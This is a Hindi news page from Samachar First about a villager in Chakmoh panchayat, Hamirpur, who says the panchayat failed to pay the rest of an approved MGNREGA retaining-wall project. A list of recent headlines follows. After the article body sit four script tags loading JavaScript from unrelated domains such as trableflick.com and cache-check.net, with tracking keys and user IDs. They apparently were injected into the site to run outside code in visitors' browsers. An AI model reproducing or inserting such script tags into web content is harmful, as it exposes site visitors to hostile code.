Categories: हिमाचल

हमीरपुरः मनरेगा कार्य सवालों के घेरे में, डंगे के निर्माण में शेष राशि भुगतान से पंचायत ने झाड़ा पल्ला

<p>जिला हमीरपुर की ग्राम पंचायत चकमोह में मनरेगा कार्य सवालों के घेरे में आ गया है। बता दें कि रोशन लाल ने मनरेगा के तहत डंगे का निर्माण करवाने के लिए पंचायत से संपर्क किया था। क्योंकि उसका मकान ढांक के गिरने से खतरे में आ गया था। प्रार्थी का यह काम क्रम संख्या 57 पर सत्र&nbsp; 2019-20 के लिए अप्रूव हुआ। जिसकी आकलित राशि 1 लाख रूपये स्वयं पंचायत के ही तकनीकी सहायक ने अपने एस्टिमेट में पारित किया। वहीं,&nbsp; 6 सितंबर 2019 को खंड विकास अधिकारी कार्यालय बिझड़ी ने पत्र संख्या 17840&nbsp; के अंतर्गत इस काम हेतु स्वीकृत की। निर्माण कार्य सामग्री हेतु 13 हजार 673 रूपये और श्रमदान हेतु 40 हजार 842 रूपये स्वीकृत किए गए यानि 54 हजार 515 रूपये स्वीकृत हुए।</p>

<p>मगर ग्राम पंचायत चकमोह ने 36 हजार 719 रूपये की लेबर अदायगी की और 2 हजार 857 रूपये के राशि सामग्री के भुगतान हेतु दी।&nbsp; ऐसे में 39 हजार 576 रूपये की अदायगियां की गई और शेष राशि के भुगतान से पंचायत ने पल्ला झाड़ लिया। प्रार्थी ने मुख्यमंत्री संकल्प हेल्पलाईन पर शिकायत की तो पंचायत सचिव ने इस काम को रोशन लाल का निजी काम बता दिया। जबकि यह काम मनरेगा के तहत स्वीकृत था और इसका कुल बजट 54 हजार 515 में से 39 हजार 576 रूपये के अदायगी करने के बाद शेष 14 हजार 939 रूपये का क्या किया गया। इसका कोई उत्तर नहीं मिल पा रहा है। निर्माण कार्य सामग्री हेतु 13 हजार 673 रूपये की अदायगी पंचायत ने नहीं की जबकि यह राशि अलग से स्वीकृत थी। रोशन लाल ने कहा कि इस मामले में उनको कोई संतोषजनक जवाब नहीं मिल रहा है और इस मामले में वे न्यायालय के शरण लेंगे।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1602762244446″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

12 mins ago

सामान्य से 3.2 डिग्री अधिक तापमान, 26 तारीख से बारिश की उम्मीद

  Shimla: प्रदेश में बीते 3 दिन से सूरज चमक रहा है। इससे सितंबर माह…

1 hour ago

शिमला-बिलासपुर हाईवे पर भूस्खलन, यातायात प्रभावित

Solan: शिमला-बिलासपुर राष्ट्रीय राजमार्ग-205 पर दाड़लाघाट के कराड़ाघाट के समीप साफ मौसम में ही पहाड़ी…

2 hours ago

PCC Meeting: सीएम की उपस्थिति पर संशय, डिप्टी सीएम नहीं होंगे

Shimla:कांग्रेस अध्यक्ष प्रतिभा सिंह ने प्रदेश कांग्रेस कमेटी कुछ ही देर में कांग्रेस भवन में…

2 hours ago

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

3 hours ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

3 hours ago